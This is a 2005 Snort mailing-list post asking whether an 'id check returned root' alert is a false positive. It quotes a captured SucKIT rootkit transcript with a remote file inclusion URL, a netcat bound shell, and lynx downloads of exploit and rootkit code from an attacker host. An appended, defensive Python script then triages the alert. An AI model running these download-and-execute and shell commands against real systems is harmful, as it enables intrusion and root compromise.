Snort mailing list archives
ATTACK-RESPONSES id check returned root
From: Chris Romano <romano.chris () gmail com>
Date: Fri, 21 Oct 2005 13:12:20 -0400
I came in this morning and checked my snort alerts (morning routine), and noticed the following:

    ATTACK-RESPONSES id check returned root 2005-10-21 07:40:32 82.165.25.125:80 10.10.10.5:51949 TCP

Some background. 10.10.10.x is my DMZ and 10.10.10.5 is a firewall/proxy (Slack 10.1) that connects the 10.10.10.x to our 192.168.0.x internal network. So I started digging around. The alert logged the following:

    SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit *.* (c)oded by sd () sf cz & devik () cdi cz, 2001 Configuring ./sk:.OK!.[attacker () badass cz ~/sk10]$ telnet lamehost.com 80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character is '^]'..GET /bighole.php3?inc=http://badass.cz/egg.php3 HTTP/1.1.Host: lamehost.com ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001 04:04:52 GMT.Server: Apache/1.3.14 (Unix) (Red-Hat/Linux) PHP/4.0.4pl1.Last-Modified: Fri, 28 Sep 2001 04:42:34 GMT.ETag: "31c6-c2-3bb3ffba".Content-Type: text/html..IT WERKS! Shell at port 8193 Connection closed by foreign host..[attacker () badass cz~/sk10]$ nc -v lamehost.com 8193.lamehost.com [ 192.168.0.2 ] 8193 (?) open.w.12:08am up 1:20, 3 users, load average: 0.05, 0.06,0.08.USER TTY FROM LOGIN@IDLE JCPU PCPU AT.roottty1 - 11:58pm 39:03 3.15s 2.95s bash.cd /tmp.lynx -dump http://badass.cz/s.c > s.c.gcc s.c o super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root) gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd .l33t.lynx -dump http://badass.cz/~attacker/sk10/s k > sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w

Ok, there are a few things that make me think that this is a false positive.

First is the "192.160.0.02" IP. That is not on this network. Second, there is no host on 192.168.0.2. Third, I do not have any Red Hat machines. They are all Slackware.

I am still concerned. I searched for "sk" and all I found are two directories related to vim, and I didn't find a directory called "l33t".

Can anyone help me out?

Thanks,
Chris
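The triage Chris walks through by hand (which side of the session produced the string, whether the bytes are a fetched web page rather than a shell's output, and whether the addresses named inside the payload are even on the local network) can be scripted. The following is an added example, not code from the post or from Snort; it assumes the signature's core content match is the literal string "uid=0(root)", treats a match arriving from a web-server port towards a high client port as web content, and uses the 10.10.10.0/24 and 192.168.0.0/24 ranges from the post as the local networks. The payload and alert fields are constructed in the shape of the ones in the post.

```python
"""Triage a Snort "ATTACK-RESPONSES id check returned root" alert.

Added example, not part of the original post or of Snort. The signature's
content match is assumed to be the literal string "uid=0(root)"; the port
heuristic and local network list are assumptions, not Snort configuration.
"""
import ipaddress
import re

# Constructed excerpt modelled on the captured payload: an HTTP reply whose
# HTML body happens to contain a textual "id" transcript.
SAMPLE_PAYLOAD = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/1.3.14 (Unix) (Red-Hat/Linux) PHP/4.0.4pl1\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"Trying 192.160.0.2...\nConnected to lamehost.com [192.168.0.2]\n"
    b"id\nuid=0(root) gid=0(root) groups=0(root)\n"
)

# Constructed alert fields laid out like the poster's log line:
# remote web server port 80 -> local proxy, ephemeral port.
SAMPLE_ALERT = {"src": "82.165.25.125", "sport": 80,
                "dst": "10.10.10.5", "dport": 51949, "proto": "TCP"}

# Assumed local ranges, taken from the network description in the post.
LOCAL_NETS = [ipaddress.ip_network("10.10.10.0/24"),
              ipaddress.ip_network("192.168.0.0/24")]

ID_ROOT = re.compile(rb"uid=0\(root\)")
IPV4 = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def id_check_returned_root(payload: bytes) -> bool:
    """The signature's content match: any 'uid=0(root)' in the stream fires it."""
    return ID_ROOT.search(payload) is not None


def is_http_response(payload: bytes) -> bool:
    """True when the bytes are an HTTP reply; a shell's id output would not be."""
    return payload.startswith(b"HTTP/1.")


def referenced_ips(payload: bytes) -> list:
    """Dotted quads mentioned inside the payload, in order of appearance."""
    found = []
    for m in IPV4.finditer(payload):
        text = m.group().decode()
        try:
            ipaddress.ip_address(text)  # drop things like 999.1.1.1
        except ValueError:
            continue
        found.append(text)
    return found


def triage(alert: dict, payload: bytes, local_nets=LOCAL_NETS) -> dict:
    """Apply the poster's reasoning to one alert and return the findings."""
    r = {"matched": id_check_returned_root(payload)}
    # The "response" left a web-server port for a high client port: the local
    # host was the client of an outbound web fetch, not the victim of a shell.
    r["from_web_server"] = alert["sport"] in (80, 443, 8080) and alert["dport"] > 1023
    r["http_document"] = is_http_response(payload)
    inside, outside = [], []
    for ip in referenced_ips(payload):
        addr = ipaddress.ip_address(ip)
        (inside if any(addr in n for n in local_nets) else outside).append(ip)
    # Addresses in local ranges are the ones worth checking against inventory;
    # addresses outside them are simply not ours, as the poster noted.
    r["ips_in_local_ranges"] = inside
    r["ips_outside_local_ranges"] = outside
    # Heuristic verdict: the string sits inside a fetched HTML document.
    r["likely_false_positive"] = r["matched"] and r["from_web_server"] and r["http_document"]
    return r


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ALERT, SAMPLE_PAYLOAD).items():
        print(f"{key}: {value}")
```

The verdict is a heuristic, not proof: it explains why the rule fired, and the list of in-range addresses tells you which hosts still deserve the kind of on-box check described in the post.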
Current thread:
- ATTACK-RESPONSES id check returned root Chris Romano (Oct 21)
- Re: ATTACK-RESPONSES id check returned root Matt Kettler (Oct 21)
- Re: ATTACK-RESPONSES id check returned root Matt Kettler (Oct 21)
- Re: ATTACK-RESPONSES id check returned root Patrick Walsh (Oct 21)
- Re: ATTACK-RESPONSES id check returned root Chris Romano (Oct 21)
- Re: ATTACK-RESPONSES id check returned root cc (Oct 21)
- RE: ATTACK-RESPONSES id check returned root Our World Is Here (Oct 24)
- RE: ATTACK-RESPONSES id check returned root Paul Schmehl (Oct 25)
- RE: ATTACK-RESPONSES id check returned root Our World Is Here (Oct 26)
- RE: ATTACK-RESPONSES id check returned root Our World Is Here (Oct 24)
- <Possible follow-ups>
- RE: ATTACK-RESPONSES id check returned root Willy, Andrew (Oct 21)